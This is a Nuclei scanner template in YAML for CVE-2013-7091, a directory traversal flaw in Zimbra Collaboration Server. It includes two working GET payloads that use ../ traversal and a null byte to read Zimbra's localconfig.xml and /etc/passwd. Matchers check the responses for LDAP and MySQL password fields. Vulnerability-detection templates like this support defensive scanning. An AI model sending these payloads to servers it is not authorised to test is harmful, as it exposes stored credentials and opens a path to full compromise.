54 lines
2.3 KiB
YAML
54 lines
2.3 KiB
YAML
id: CVE-2013-7091
|
|
|
|
info:
|
|
name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
|
|
author: rubina119
|
|
severity: medium
|
|
description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
|
|
- https://www.exploit-db.com/exploits/30085
|
|
- https://www.exploit-db.com/exploits/30472
|
|
- http://www.exploit-db.com/exploits/30085
|
|
- http://packetstormsecurity.com/files/124321
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2013-7091
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97375
|
|
epss-percentile: 0.99888
|
|
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: synacor
|
|
product: zimbra_collaboration_suite
|
|
tags: packetstorm,zimbra,lfi,edb,cve,cve2013,synacor
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
|
|
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "zimbra_server_hostname"
|
|
- "zimbra_ldap_userdn"
|
|
- "zimbra_ldap_password"
|
|
- "ldap_postfix_password"
|
|
- "ldap_amavis_password"
|
|
- "ldap_nginx_password"
|
|
- "mysql_root_password"
|
|
condition: or
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root=.*:0:0"
|
|
# digest: 490a0046304402207e212e819f8b98af75a3f46028c312d29963304996ccebebb39a69120f774a130220502bd3746f3637f814f71987e3f8ab5a8c0b76d7648bb71529b7dbcb2e400686:922c64590222798bb761d5b6d8e72950 |